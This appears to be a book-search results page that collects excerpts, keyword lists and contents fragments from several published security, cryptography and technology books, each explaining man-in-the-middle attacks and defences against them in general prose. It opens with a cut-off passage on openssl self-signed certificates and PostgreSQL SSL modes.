The following commands generate a self-signed certificate for your server: openssl genrsa 1024 > server.key openssl req -new -x509 -key server.key -out server.crt Read more on x509 keys and certificates in openSSL's HowTo pages at the following website: http://www.openssl.org/docs/HOWTO/ Setting up a client to use SSL Client behavior is controlled by an environment variable, PGSSLMODE, that can have the following values, as defined in the official PostgreSQL documents: SSL mode Eavesdropping protection MITM protection Statement disabled No No I don't care about security, and I don't want to pay the overhead of encryption. allow Maybe No I don't care about security, but I will pay the overhead of encryption if the server insists on it. prefer Maybe No I don't care about encryption, but I wish to pay the overhead of encryption if the server supports it.


pages: 448 words: 117,325

Click Here to Kill Everybody: Security and Survival in a Hyper-Connected World by Bruce Schneier

23andMe, 3D printing, air gap, algorithmic bias, autonomous vehicles, barriers to entry, Big Tech, bitcoin, blockchain, Brian Krebs, business process, Citizen Lab, cloud computing, cognitive bias, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, cuban missile crisis, Daniel Kahneman / Amos Tversky, David Heinemeier Hansson, disinformation, Donald Trump, driverless car, drone strike, Edward Snowden, Elon Musk, end-to-end encryption, fault tolerance, Firefox, Flash crash, George Akerlof, incognito mode, industrial robot, information asymmetry, information security, Internet of things, invention of radio, job automation, job satisfaction, John Gilmore, John Markoff, Kevin Kelly, license plate recognition, loose coupling, market design, medical malpractice, Minecraft, MITM: man-in-the-middle, move fast and break things, national security letter, Network effects, Nick Bostrom, NSO Group, pattern recognition, precautionary principle, printed gun, profit maximization, Ralph Nader, RAND corporation, ransomware, real-name policy, Rodney Brooks, Ross Ulbricht, security theater, self-driving car, Seymour Hersh, Shoshana Zuboff, Silicon Valley, smart cities, smart transportation, Snapchat, sparse data, Stanislav Petrov, Stephen Hawking, Stuxnet, supply-chain attack, surveillance capitalism, The Market for Lemons, Timothy McVeigh, too big to fail, Uber for X, Unsafe at Any Speed, uranium enrichment, Valery Gerasimov, Wayback Machine, web application, WikiLeaks, Yochai Benkler, zero day

Nathaniel Popper (21 Aug 2017), “Identity thieves hijack cellphone accounts to go after virtual currency,” New York Times, https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html. 49This is called a man-in-the-middle attack: Rapid7 (9 Aug 2017), “Man-in-the-middle (MITM) attacks,” Rapid7 Fundamentals, https://www.rapid7.com/fundamentals/man-in-the-middle-attacks. 49A credit card issuer might flag: Gartner (accessed 24 Apr 2018), “Reviews for online fraud detection,” https://www.gartner.com/reviews/market/Online Fraud DetectionSystems. 50This was one of the techniques: David Kushner (26 Feb 2013), “The real story of Stuxnet,” IEEE Spectrum, https://spectrum.ieee.org/telecom/security/the-real-story-of-stuxnet. 50For years, though, hackers have been: Dan Goodin (3 Nov 2017), “Stuxnet-style code signing is more widespread than anyone thought,” Ars Technica, https://arstechnica.com/information-technology/2017/11/evasive-code-signed-malware-flourished-before-stuxnet-and-still-does.

Sharon Goldberg (22 Jun 2017), “Surveillance without borders: The ‘traffic shaping’ loophole and why it matters,” Century Foundation, https://tcf.org/content/report/surveillance-without-borders-the-traffic-shaping-loophole-and-why-it-matters. 22In 2013, one company reported: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking. 22In 2014, the Turkish government: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking. 22In 2017, traffic to and from: Dan Goodin (13 Dec 2017), “‘Suspicious’ event routes traffic for big-name sites through Russia,” Ars Technica, https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia. 22a 2008 talk at the DefCon hackers conference: Dan Goodin (27 Aug 2008), “Hijacking huge chunks of the internet: A new How To,” Register, https://www.theregister.co.uk/2008/08/27/bgp_exploit_revealed. 23“It’s not that we didn’t think about security”: Craig Timberg (30 May 2015), “A flaw in the design,” Washington Post, http://www.washingtonpost.com/sf/business/2015/05/30/net-of-insecurity-part-1. 23“It is highly desirable that Internet carriers”: Brian E.

In a nutshell, he said that zero-day vulnerabilities are overrated, and credential stealing is how he gets into networks. He’s right. As bad as software vulnerabilities are, the most common way hackers break into networks is by abusing the authentication process. They steal passwords, set up man-in-the-middle attacks to piggyback on legitimate log-ins, or masquerade as authorized users. Credential stealing doesn’t require finding a zero-day or an unpatched vulnerability, plus there’s less chance of discovery, and it gives the attacker more flexibility in technique. This isn’t just true for the NSA; it’s true for all attackers.


pages: 492 words: 118,882

The Blockchain Alternative: Rethinking Macroeconomic Policy and Economic Theory by Kariappa Bheemaiah

"World Economic Forum" Davos, accounting loophole / creative accounting, Ada Lovelace, Adam Curtis, Airbnb, Alan Greenspan, algorithmic trading, asset allocation, autonomous vehicles, balance sheet recession, bank run, banks create money, Basel III, basic income, behavioural economics, Ben Bernanke: helicopter money, bitcoin, Bletchley Park, blockchain, Bretton Woods, Brexit referendum, business cycle, business process, call centre, capital controls, Capital in the Twenty-First Century by Thomas Piketty, cashless society, cellular automata, central bank independence, Charles Babbage, Claude Shannon: information theory, cloud computing, cognitive dissonance, collateralized debt obligation, commoditize, complexity theory, constrained optimization, corporate governance, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, cross-border payments, crowdsourcing, cryptocurrency, data science, David Graeber, deep learning, deskilling, Diane Coyle, discrete time, disruptive innovation, distributed ledger, diversification, double entry bookkeeping, Ethereum, ethereum blockchain, fiat currency, financial engineering, financial innovation, financial intermediation, Flash crash, floating exchange rates, Fractional reserve banking, full employment, George Akerlof, Glass-Steagall Act, Higgs boson, illegal immigration, income inequality, income per capita, inflation targeting, information asymmetry, interest rate derivative, inventory management, invisible hand, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Joseph Schumpeter, junk bonds, Kenneth Arrow, Kenneth Rogoff, Kevin Kelly, knowledge economy, large denomination, Large Hadron Collider, Lewis Mumford, liquidity trap, London Whale, low interest rates, low skilled workers, M-Pesa, machine readable, Marc Andreessen, market bubble, market fundamentalism, Mexican peso crisis / tequila crisis, Michael Milken, MITM: man-in-the-middle, Money creation, money market fund, money: store of value / unit of account / medium of exchange, mortgage debt, natural language processing, Network effects, new economy, Nikolai Kondratiev, offshore financial centre, packet switching, Pareto efficiency, pattern recognition, peer-to-peer lending, Ponzi scheme, power law, precariat, pre–internet, price mechanism, price stability, private sector deleveraging, profit maximization, QR code, quantitative easing, quantitative trading / quantitative finance, Ray Kurzweil, Real Time Gross Settlement, rent control, rent-seeking, robo advisor, Satoshi Nakamoto, Satyajit Das, Savings and loan crisis, savings glut, seigniorage, seminal paper, Silicon Valley, Skype, smart contracts, software as a service, software is eating the world, speech recognition, statistical model, Stephen Hawking, Stuart Kauffman, supply-chain management, technology bubble, The Chicago School, The Future of Employment, The Great Moderation, the market place, The Nature of the Firm, the payments system, the scientific method, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, too big to fail, trade liberalization, transaction costs, Turing machine, Turing test, universal basic income, Vitalik Buterin, Von Neumann architecture, Washington Consensus

The system uses cryptographic signatures in place of server-side password storage, thus solving a common security problem30 for IT administrators (Cawrey, 2014). BitAuth uses Bitcoin’s technology to create a public-private key pair using secp256k1. By providing the user with a system identification number (SIN) that is a hash of the public key, it allows for password-less authentication across web services. It uses signage to prevent man-in-the-middle (MITM) attacks, and a nonce to prevent replay attacks (Raval, 2016). The private key is never revealed to the server and can be stored safely and securely. Identity is decentralized, so instead of having to trust a third party to store identity, a user can store it themselves. The OpenID protocol , developed by the OpenID Foundation, is also pioneering this concept.

relative industry shares risk innovation CDOs, CLOs and CDSs non-financial firms originate, repackage and sell model originate-to-distribute model originate-to-hold model principal component production and exchange sharding Blockchain FinTech transformation global Fintech financing activity private sector skeleton keys AI-led high frequency trading amalgamation Blockchain fragmentation process information asymmetries Kabbage KYC/AML procedures KYC process machine learning P2P lending sector payments and remittances sector physical barriers rehypothecation robo-advisors SWIFT and ACH transferwise solution pathways digital identity and KYC private and public utilization scalability TBTF See(Too Big to Fail (TBTF)) television advertisement Financialization SeeFragmentation Financial Stability Oversight Committee (FSOC) Financial system Financial Technology (FinTech) capital markets Carney, Mark CHIPS financial services financing activities histroy insurance sector investment/wealth management lending platforms payments Foreign direct investment (FDI) Fractional Reserve banking base and broad money capital requirements central banks commercial banks exchanging currency fractional banking governments monetary policies monetary policy objectives Tier 1, Tier 2, and Tier 3 capital value of a currency Fragmentation concept of current economic malaise dial-up Internet access evolutionary biology Haldane, Andy information asymmetry limitations problem-solving approaches regulatory-centric approach systemic risk TBTF US telecoms industry G Genetic algorithm (GA) Gramm-Leach-Bliley Financial Modernization Act Greenspan, Alan Gresham’s law Guardtime H Haldane, Andy Heterogenous interacting agents High-frequency trading (HFT) Human uncertainty principle HYPR I Implicit contracts Information and communication technologies (ICTs) Institute for New Economical Thinking (INET) Insurance sector InterLedger Protocol (ILP) Internal Revenue Service (IRS) iSignthis J Junk bonds K Kashkari, Neel Kelton, Stephanie Kim-Markowitz Portfolio Insurers Model Know Your Business (KYB) Know Your Customer (KYC) advantage Atlantic model concept of contextual scenario development of documents empirical approach Government digital identity programs identity identity and KYC/AML services Kabbage KYC-Chain manifestations merchant processor multidimensional attributes multiple sources Namecoin blockchain OpenID protocol procedural system regulatory institutions tokenized identity transactional systems value exchange platforms vast-ranging subject Zooko’s triangle kompany.com L Large hadron collider (LHC) Living Will Review process M Macroeconomic models types cellular automata (CA) equilibrium business-cycle models genetic algorithm (GA) neural networks rational expectations structural models traditional structural models vector autoregression (VAR) models Macroeconomic theories Man-in-the-middle (MITM) Marketing money cashless system crime and taxation economy IRS money Seigniorage tax evasion Mathematical game theory McFadden Act Mincome, Canada Minority Game (MG) Money anddebt See alsoDebt and money capitalism cash obsession CRS report currencies floating exchange functions gold and silver history of money histroy real commodities transfer of types of withdrawn shadowbanking See(Shadow banking and systemic risk) utilitarian approach Multiple currencies Bitcoin Obituaries bitcoin price BTC/USD and USD/EUR volatility contractual money cryptocurrencies differences free banking Gresham’s law legal definition legal status private and government fiat private money quantitative model sovereign cash volatility N Namecoin blockchain Namibia Natural Language Processing (NLP) NemID Neo-Keynesian models Neuroplasticity New Keynesian models (NK models) O Occupational Information Network (ONET) Office of Scientific Research and Development (OSRD) OpenID protocol Originate, repackage and sell model Originate-to-distribute model P Paine, Thomas Palley, Thomas I.


pages: 305 words: 93,091

The Art of Invisibility: The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data by Kevin Mitnick, Mikko Hypponen, Robert Vamosi

4chan, big-box store, bitcoin, Bletchley Park, blockchain, connected car, crowdsourcing, data science, Edward Snowden, en.wikipedia.org, end-to-end encryption, evil maid attack, Firefox, Google Chrome, Google Earth, incognito mode, information security, Internet of things, Kickstarter, Laura Poitras, license plate recognition, Mark Zuckerberg, MITM: man-in-the-middle, off-the-grid, operational security, pattern recognition, ransomware, Ross Ulbricht, Salesforce, self-driving car, Silicon Valley, Skype, Snapchat, speech recognition, Tesla Model S, web application, WikiLeaks, zero day, Zimmermann PGP

Girls send, on average, about 3,952 text messages per month, and boys send closer to 2,815 text messages per month, according to the study.12 The good news is that today all the popular messaging apps provide some form of encryption when sending and receiving your texts—that is, they protect what’s called “data in motion.” The bad news is that not all the encryption being used is strong. In 2014, researcher Paul Jauregui of the security firm Praetorian found that it was possible to circumvent the encryption used by WhatsApp and engage in a man-in-the-middle (MitM) attack, in which the attacker intercepts messages between the victim and his recipient and is able to see every message. “This is the kind of stuff the NSA would love,” Jauregui observed.13 As of this writing, the encryption used in WhatsApp has been updated and uses end-to-end encryption on both iOS and Android devices.

Because I’m sitting in the middle of the interaction between the victim and the website, I can inject JavaScript and cause fake Adobe updates to pop up on his or her screen, which, if installed will infect the victim’s computer with malware. The purpose is usually to trick you into installing the fake update to gain control of your computer. When the guy at the corner table is influencing the Internet traffic, that’s called a man-in-the-middle attack. The attacker is proxying your packets through to the real site, but intercepting or injecting data along the way. Knowing that you could unintentionally connect to a shady Wi-Fi access point, how can you prevent it? On a laptop the device will go through the process of searching for a preferred wireless network and then connect to it.

The argument in favor of keeping the TV in listening mode is that the device needs to hear any additional commands you might give it, such as “Volume up,” “Change the channel,” and “Mute the sound.” That might be okay, except the captured voice commands go up to a satellite before they come back down again. And because the entire string of data is not encrypted, I can carry out a man-in-the-middle attack on your TV, inserting my own commands to change your channel, pump up your volume, or simply turn off the TV whenever I want. Let’s think about that for a second. That means if you’re in a room with a voice-activated TV, in the middle of a conversation with someone, and you decide to turn on the TV, the stream of conversation that follows may be recorded by your digital TV.


Multitool Linux: Practical Uses for Open Source Software by Michael Schwarz, Jeremy Anderson, Peter Curtis

business process, Debian, defense in depth, Free Software Foundation, GnuPG, index card, indoor plumbing, Larry Ellison, Larry Wall, MITM: man-in-the-middle, optical character recognition, PalmPilot, publish or perish, RFC: Request For Comment, Richard Stallman, seminal paper, SETI@home, slashdot, the Cathedral and the Bazaar, two and twenty, web application

Danger, Will Robinson! Danger! Harken back, if you will, to Chapter 10. Once again, you are dealing with cryptographic keys and trust. Only you can decide whether to trust the host key. Once you have done so, it is trusted for all time. Key discovery by connection is very risky. It is easily foiled by a "Man in the Middle" attack (MITM). You could be connecting to a spoofed host, where they are feeding you a key of their own creation. They will then make a connection of their own to the real host. Just as with GPG, I prefer to ship host keys in person. In this case, however, let's throw caution to the wind and proceed: Are you sure you want to continue connecting (yes/no)?


Applied Cryptography: Protocols, Algorithms, and Source Code in C by Bruce Schneier

active measures, cellular automata, Claude Shannon: information theory, complexity theory, dark matter, Donald Davies, Donald Knuth, dumpster diving, Dutch auction, end-to-end encryption, Exxon Valdez, fault tolerance, finite state, heat death of the universe, information security, invisible hand, John von Neumann, knapsack problem, MITM: man-in-the-middle, Multics, NP-complete, OSI model, P = NP, packet switching, quantum cryptography, RAND corporation, RFC: Request For Comment, seminal paper, software patent, telemarketer, traveling salesman, Turing machine, web of trust, Zimmermann PGP

Then he simply waits for Alice and Bob to talk with each other, intercepts and modifies the messages, and he has succeeded. This man-in-the-middle attack works because Alice and Bob have no way to verify that they are talking to each other. Assuming Mallory doesn’t cause any noticeable network delays, the two of them have no idea that someone sitting between them is reading all of their supposedly secret communications. Interlock Protocol The interlock protocol, invented by Ron Rivest and Adi Shamir [1327], has a good chance of foiling the man-in-the-middle attack. Here’s how it works: (1) Alice sends Bob her public key. (2) Bob sends Alice his public key. (3) Alice encrypts her message using Bob’s public key.

Steps (1) through (3) are identical to SKID2, and then the protocol proceeds with: (4) Alice sends Bob: HK(RB,A) A is Alice’s name. (5) Bob computes HK(RB,A), and compares it with what he received from Alice. If the results are identical, then Bob knows that he is communicating with Alice. This protocol is not secure against a man-in-the-middle attack. In general, a man-in-the-middle attack can defeat any protocol that doesn’t involve a secret of some kind. Message Authentication When Bob receives a message from Alice, how does he know it is authentic? If Alice signed her message, this is easy. Alice’s digital signature is enough to convince anyone that the message is authentic.

EKE is patented [111]. 22.6 Fortified Key Negotiation This scheme also protects key-negotiation schemes from poorly chosen passwords and man-in-the-middle attacks [47,983]. It uses a hash function of two variables that has a very special property: It has many collisions on the first variable while having effectively no collisions on the second variable. H´(x, y) = H(H(k, x) mod 2m, x), where H(k, x) is an ordinary hash function on k and x Here’s the protocol. Alice and Bob share a secret password, P, and have just exchanged a secret key, K, using Diffie-Hellman key exchange. They use P to check that their two session keys are the same (and that Eve is not attempting a man-in-the-middle attack), without giving P away to Eve. (1) Alice sends Bob H´ (P, K) (2) Bob computes H´ (P, K) and compares his result with what he received from Alice.


pages: 540 words: 103,101

Building Microservices by Sam Newman

airport security, Amazon Web Services, anti-pattern, business logic, business process, call centre, continuous integration, Conway's law, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fail fast, fallacies of distributed computing, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, Salesforce, SimCity, social graph, software as a service, source of truth, sunk-cost fallacy, systems thinking, the built environment, the long tail, two-pizza team, web application, WebSocket

Depending on the sensitivity of the data, this might be fine. Some organizations attempt to ensure security at the perimeter of their networks, and therefore assume they don’t need to do anything else when two services are talking together. However, should an attacker penetrate your network, you will have little protection against a typical man-in-the-middle attack. If the attacker decides to intercept and read the data being sent, change the data without you knowing, or even in some circumstances pretend to be the thing you are talking to, you may not know much about it. This is by far the most common form of inside-perimeter trust I see in organizations.

If you’re using a gateway, you’ll need to route all in-network traffic via the gateway too, but if each service is handling the integration itself, this approach should just work out of the box. The advantage here is that you’re making use of existing infrastructure, and get to centralize all your service access controls in a central directory server. We’d still need to route this over HTTPS if we wanted to avoid man-in-the-middle attacks. Clients have a set of credentials they use to authenticate themselves with the identity provider, and the service gets the information it needs to decide on any fine-grained authentication. This does mean you’ll need an account for your clients, sometimes referred to as a service account.

An alternative approach, as used extensively by Amazon’s S3 APIs for AWS and in parts of the OAuth specification, is to use a hash-based messaging code (HMAC) to sign the request. With HMAC the body request along with a private key is hashed, and the resulting hash is sent along with the request. The server then uses its own copy of the private key and the request body to re-create the hash. If it matches, it allows the request. The nice thing here is that if a man in the middle messes with the request, then the hash won’t match and the server knows the request has been tampered with. And the private key is never sent in the request, so it cannot be compromised in transit! The added benefit is that this traffic can then more easily be cached, and the overhead of generating the hashes may well be lower than handling HTTPS traffic (although your mileage may vary).


pages: 398 words: 120,801

Little Brother by Cory Doctorow

Aaron Swartz, airport security, Bayesian statistics, Berlin Wall, citizen journalism, Firefox, game design, Golden Gate Park, Haight Ashbury, Internet Archive, Isaac Newton, Jane Jacobs, Jeff Bezos, John Gilmore, John Perry Barlow, mail merge, Mitch Kapor, MITM: man-in-the-middle, Neal Stephenson, RFID, San Francisco homelessness, Sand Hill Road, Silicon Valley, slashdot, Steve Jobs, Steve Wozniak, Thomas Bayes, web of trust, zero day

If you want, you can make him seem erratic and unreliable so they get rid of him. You can manufacture crises that might make one side or the other reveal the identities of other spies. In short, you own them. This is called the man-in-the-middle attack and if you think about it, it's pretty scary. Someone who man-in-the-middles your communications can trick you in any of a thousand ways. Of course, there's a great way to get around the man-in-the-middle attack: use crypto. With crypto, it doesn't matter if the enemy can see your messages, because he can't decipher them, change them, and re-send them. That's one of the main reasons to use crypto.

If it's really easy for anyone to know what your real key is, man-in-the-middle gets harder and harder. But you know what? Making things well-known is just as hard as keeping them secret. Think about it -- how many billions of dollars are spent on shampoo ads and other crap, just to make sure that as many people know about something that some advertiser wants them to know? There's a cheaper way of fixing man-in-the-middle: the web of trust. Say that before you leave HQ, you and your bosses sit down over coffee and actually tell each other your keys. No more man-in-the-middle! You're absolutely certain whose keys you have, because they were put into your own hands.


pages: 1,302 words: 289,469

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto

business logic, call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, information security, lateral thinking, machine readable, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, SQL injection, Turing test, Wayback Machine, web application

It also remains resident within the user's browser if she navigates to other pages within the application. Man-in-the-Middle Attacks Earlier chapters described how a suitably positioned attacker can intercept sensitive data, such as passwords and session tokens, if an application uses unencrypted F1TTP communications. What is more surprising is that some serious attacks can still be performed even if an application uses HTTPS for all sensitive data and the target user always verifies that HTTPS is being used properly. These attacks involve an "active" man in the middle. Instead of just passively monitoring another user's traffic, this type of attacker also changes some of that traffic on the fly.

Many applications use HTTP for nonsensitive content, such as product descriptions and help pages. If such content makes any script includes using absolute URLs, an active man-in-the-middle attack can be used to compromise HTTPS-protected requests on the same domain. For example, an application's help page may contain the following: <script src="http://wahh-app.com/help.j s"></script> Chapter 15 ■ Attacking Users: Other Techniques 567 This behavior of using absolute URLs to include scripts over HTTP appears in numerous high-profile applications on the web today. In this situation, an active man-in-the-middle attacker could, of course, modify any HTTP response to execute arbitrary script code.

vii Contents at a Glance viii Contents Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is Secure" 7 The Core Security Problem: Users Can Submit Arbitrary Input 9 Key Problem Factors 10 The New Security Perimeter 12 The Future of Web Application Security 14 Summary 15 Chapter 2 Core Defense Mechanisms 17 Handling User Access 18 Authentication 18 Session Management 19 Access Control 20 Handling User Input 21 Varieties of Input 21 Approaches to Input Handling 23 Boundary Validation 25 Multistep Validation and Canonicalization 28 Handling Attackers 30 Handling Errors 30 Maintaining Audit Logs 31 Alerting Administrators 33 Reacting to Attacks 34 X Contents Chapter 3 Chapter 4 Contents xi Chapter 5 Bypassing Client-Side Controls 117 Transmitting Data Via the Client 118 Hidden Form Fields 118 HTTP Cookies 121 URL Parameters 121 The Referer Header 122 Opaque Data 123 The ASP.NET ViewState 124 Capturing User Data: HTML Forms 127 Length Limits 128 Script-Based Validation 129 Disabled Elements 131 Capturing User Data: Browser Extensions 133 Common Browser Extension Technologies 134 Approaches to Browser Extensions 135 Intercepting Traffic from Browser Extensions 135 Decompiling Browser Extensions 139 Attaching a Debugger 151 Native Client Components 153 Handling Client-Side Data Securely 154 Transmitting Data Via the Client 154 Validating Client-Generated Data 155 Logging and Alerting 156 Summary 156 Questions 157 Chapter 6 Attacking Authentication 159 Authentication Technologies 160 Design Flaws in Authentication Mechanisms 161 Bad Passwords 161 Brute-Forcible Login 162 Verbose Failure Messages 166 Vulnerable Transmission of Credentials 169 Password Change Functionality 171 Forgotten Password Functionality 173 "Remember Me" Functionality 176 User Impersonation Functionality 178 Incomplete Validation of Credentials 180 Nonunique Usernames 181 Predictable Usernames 182 Predictable Initial Passwords 183 Insecure Distribution of Credentials 184 Implementation Flaws in Authentication 185 Fail-Open Login Mechanisms 185 Defects in Multistage Login Mechanisms 186 Insecure Storage of Credentials 190 xii Contents Securing Authentication 191 Use Strong Credentials 192 Handle Credentials Secretively 192 Validate Credentials Properly 193 Prevent Information Leakage 195 Prevent Brute-Force Attacks 196 Prevent Misuse of the Password Change Function 199 Prevent Misuse of the Account Recovery Function 199 Log, Monitor, and Notify 201 Summary 201 Questions 202 Chapter 7 Attacking Session Management 205 The Need for State 206 Alternatives to Sessions 208 Weaknesses in Token Generation 210 Meaningful Tokens 210 Predictable Tokens 213 Encrypted Tokens 223 Weaknesses in Session Token Handling 233 Disclosure of Tokens on the Network 234 Disclosure of Tokens in Logs 237 Vulnerable Mapping of Tokens to Sessions 240 Vulnerable Session Termination 241 Client Exposure to Token Hijacking 243 Liberal Cookie Scope 244 Securing Session Management 248 Generate Strong Tokens 248 Protect Tokens Throughout Their Life Cycle 250 Log, Monitor, and Alert 253 Summary 254 Questions 255 Chapter 8 Attacking Access Controls 257 Common Vulnerabilities 258 Completely Unprotected Functionality 259 Identifier-Based Functions 261 Multistage Functions 262 Static Files 263 Platform Misconfiguration 264 Insecure Access Control Methods 265 Attacking Access Controls 266 Testing with Different User Accounts 267 Testing Multistage Processes 271 Testing with Limited Access 273 Testing Direct Access to Methods 276 Testing Controls Over Static Resources 277 Contents xiii Testing Restrictions on HTTP Methods 278 Securing Access Controls 278 A Multilayered Privilege Model 280 Summary 284 Questions 284 Chapter 9 Attacking Data Stores 287 Injecting into Interpreted Contexts 288 Bypassing a Login 288 Injecting into SQL 291 Exploiting a Basic Vulnerability 292 Injecting into Different Statement Types 294 Finding SQL Injection Bugs 298 Fingerprinting the Database 303 The UNION Operator 304 Extracting Useful Data 308 Extracting Data with UNION 308 Bypassing Filters 311 Second-Order SQL Injection 313 Advanced Exploitation 314 Beyond SQL Injection: Escalating the Database Attack 325 Using SQL Exploitation Tools 328 SQL Syntax and Error Reference 332 Preventing SQL Injection 338 Injecting into NoSQL 342 Injecting into MongoDB 343 Injecting into XPath 344 Subverting Application Logic 345 Informed XPath Injection 346 Blind XPath Injection 347 Finding XPath Injection Flaws 348 Preventing XPath Injection 349 Injecting into LDAP 349 Exploiting LDAP Injection 351 Finding LDAP Injection Flaws 353 Preventing LDAP Injection 354 Summary 354 Questions 354 Chapter 10 Attacking Back-End Components 357 Injecting OS Commands 358 Example 1: Injecting Via Perl 358 Example 2: Injecting Via ASP 360 Injecting Through Dynamic Execution 362 Finding OS Command Injection Flaws 363 Finding Dynamic Execution Vulnerabilities 366 xiv Contents Preventing OS Command Injection 367 Preventing Script Injection Vulnerabilities 368 Manipulating File Paths 368 Path Traversal Vulnerabilities 368 File Inclusion Vulnerabilities 381 Injecting into XML Interpreters 383 Injecting XML External Entities 384 Injecting into SOAP Services 386 Finding and Exploiting SOAP Injection 389 Preventing SOAP Injection 390 Injecting into Back-end HTTP Requests 390 Server-side HTTP Redirection 390 HTTP Parameter Injection 393 Injecting into Mail Services 397 E-mail Header Manipulation 398 SMTP Command Injection 399 Finding SMTP Injection Flaws 400 Preventing SMTP Injection 402 Summary 402 Questions 403 Chapter 11 Attacking Application Logic 405 The Nature of Logic Flaws 406 Real-World Logic Flaws 406 Example 1: Asking the Oracle 407 Example 2: Fooling a Password Change Function 409 Example 3: Proceeding to Checkout 410 Example 4: Rolling Your Own Insurance 412 Example 5: Breaking the Bank 414 Example 6: Beating a Business Limit 416 Example 7: Cheating on Bulk Discounts 418 Example 8: Escaping from Escaping 419 Example 9: Invalidating Input Validation 420 Example 10: Abusing a Search Function 422 Example 11: Snarfing Debug Messages 424 Example 12: Racing Against the Login 426 Avoiding Logic Flaws 428 Summary 429 Questions 430 Chapter 12 Attacking Users: Cross-Site Scripting 431 Varieties of XSS 433 Reflected XSS Vulnerabilities 434 Stored XSS Vulnerabilities 438 DOM-Based XSS Vulnerabilities 440 XSS Attacks in Action 442 Real-World XSS Attacks 442 Contents xv Payloads for XSS Attacks 443 Delivery Mechanisms for XSS Attacks 447 Finding and Exploiting XSS Vulnerabilities 451 Finding and Exploiting Reflected XSS Vulnerabilities 452 Finding and Exploiting Stored XSS Vulnerabilities 481 Finding and Exploiting DOM-Based XSS Vulnerabilities 487 Preventing XSS Attacks 492 Preventing Reflected and Stored XSS 492 Preventing DOM-Based XSS 496 Summary 498 Questions 498 Chapter 13 Attacking Users: Other Techniques 501 Inducing User Actions 501 Request Forgery 502 UI Redress 511 Capturing Data Cross-Domain 515 Capturing Data by Injecting HTML 516 Capturing Data by Injecting CSS 517 JavaScript Hijacking 519 The Same-Origin Policy Revisited 524 The Same-Origin Policy and Browser Extensions 525 The Same-Origin Policy and HTML5 528 Crossing Domains with Proxy Service Applications 529 Other Client-Side Injection Attacks 531 HTTP Header Injection 531 Cookie Injection 536 Open Redirection Vulnerabilities 540 Client-Side SQL Injection 547 Client-Side HTTP Parameter Pollution 548 Local Privacy Attacks 550 Persistent Cookies 550 Cached Web Content 551 Browsing History 552 Autocomplete 552 Flash Local Shared Objects 553 Silverlight Isolated Storage 553 Internet Explorer userData 554 HTML5 Local Storage Mechanisms 554 Preventing Local Privacy Attacks 554 Attacking ActiveX Controls 555 Finding ActiveX Vulnerabilities 556 Preventing ActiveX Vulnerabilities 558 Attacking the Browser 559 Logging Keystrokes 560 Stealing Browser History and Search Queries 560 xvi Contents Enumerating Currently Used Applications 560 Port Scanning 561 Attacking Other Network Hosts 561 Exploiting Non-HTTP Services 562 Exploiting Browser Bugs 563 DNS Rebinding 563 Browser Exploitation Frameworks 564 Man-in-the-Middle Attacks 566 Summary 568 Questions 568 Chapter 14 Automating Customized Attacks 571 Uses for Customized Automation 572 Enumerating Valid Identifiers 573 The Basic Approach 574 Detecting Hits 574 Scripting the Attack 576 JAttack 577 Harvesting Useful Data 583 Fuzzing for Common Vulnerabilities 586 Putting It All Together: Burp Intruder 590 Barriers to Automation 602 Session-Handling Mechanisms 602 CAPTCHA Controls 610 Summary 613 Questions 613 Chapter 15 Exploiting Information Disclosure 615 Exploiting Error Messages 615 Script Error Messages 616 Stack Traces 617 Informative Debug Messages 618 Server and Database Messages 619 Using Public Information 623 Engineering Informative Error Messages 624 Gathering Published Information 625 Using Inference 626 Preventing Information Leakage 627 Use Generic Error Messages 628 Protect Sensitive Information 628 Minimize Client-Side Information Leakage 629 Summary 629 Questions 630 Chapter 16 Attacking Native Compiled Applications 633 Buffer Overflow Vulnerabilities 634 Stack Overflows 634 Heap Overflows 635 Contents xvii "Off-by-One" Vulnerabilities 636 Detecting Buffer Overflow Vulnerabilities 639 Integer Vulnerabilities 640 Integer Overflows 640 Signedness Errors 641 Detecting Integer Vulnerabilities 642 Format String Vulnerabilities 643 Detecting Format String Vulnerabilities 644 Summary 645 Questions 645 Chapter 17 Attacking Application Architecture 647 Tiered Architectures 647 Attacking Tiered Architectures 648 Securing Tiered Architectures 654 Shared Flosting and Application Service Providers 656 Virtual Hosting 657 Shared Application Services 657 Attacking Shared Environments 658 Securing Shared Environments 665 Summary 667 Questions 667 Chapter 18 Attacking the Application Server 669 Vulnerable Server Configuration 670 Default Credentials 670 Default Content 671 Directory Listings 677 WebDAV Methods 679 The Application Server as a Proxy 682 Misconfigured Virtual Hosting 683 Securing Web Server Configuration 684 Vulnerable Server Software 684 Application Framework Flaws 685 Memory Management Vulnerabilities 687 Encoding and Canonicalization 689 Finding Web Server Flaws 694 Securing Web Server Software 695 Web Application Firewalls 697 Summary 699 Questions 699 Chapter 19 Finding Vulnerabilities in Source Code 701 Approaches to Code Review 702 Black-Box Versus White-Box Testing 702 Code Review Methodology 703 Signatures of Common Vulnerabilities 704 Cross-Site Scripting 704 xviii Contents Chapter 20 Contents xix Technical Challenges Faced by Scanners 778 Current Products 781 Using a Vulnerability Scanner 783 Other Tools 785 Wikto/Nikto 785 Firebug 785 Hydra 785 Custom Scripts 786 Summary 789 Chapter 21 A Web Application Hacker's Methodology 791 General Guidelines 793 1 Map the 